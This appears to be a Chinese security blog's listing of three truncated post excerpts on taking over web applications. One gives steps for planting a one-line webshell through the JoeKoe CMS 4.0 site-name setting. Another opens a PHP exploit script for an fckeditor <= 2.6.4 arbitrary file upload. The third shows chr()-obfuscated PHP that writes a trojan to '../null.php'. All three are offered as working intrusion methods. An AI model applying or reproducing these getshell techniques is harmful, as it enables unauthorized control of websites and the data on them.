摘要:
上传漏洞:看/common/include/web.upload.asp 中的代码 乔客(JoeKoe) CMS 4.0后台拿shell。来到后台—>系统管理—>网站配置—>网站名称—>在网站名称那里写入一句话。 然后通过一句话链接器连接. www.XXX.com/index.asp 即可! 阅读全文
摘要:
fckeditor <= 2.6.4 任意文件上传漏洞, php coldfunsion应该KO了,asp表示很淡定,其他语言版本未测 <? error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); de 阅读全文
摘要:
后台可以提交构造代码绕过过滤,成功解析生成一句话木马. <?php $filen=chr(46).chr(46).chr(47).chr(110).chr(117).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112); $filec=chr(60 阅读全文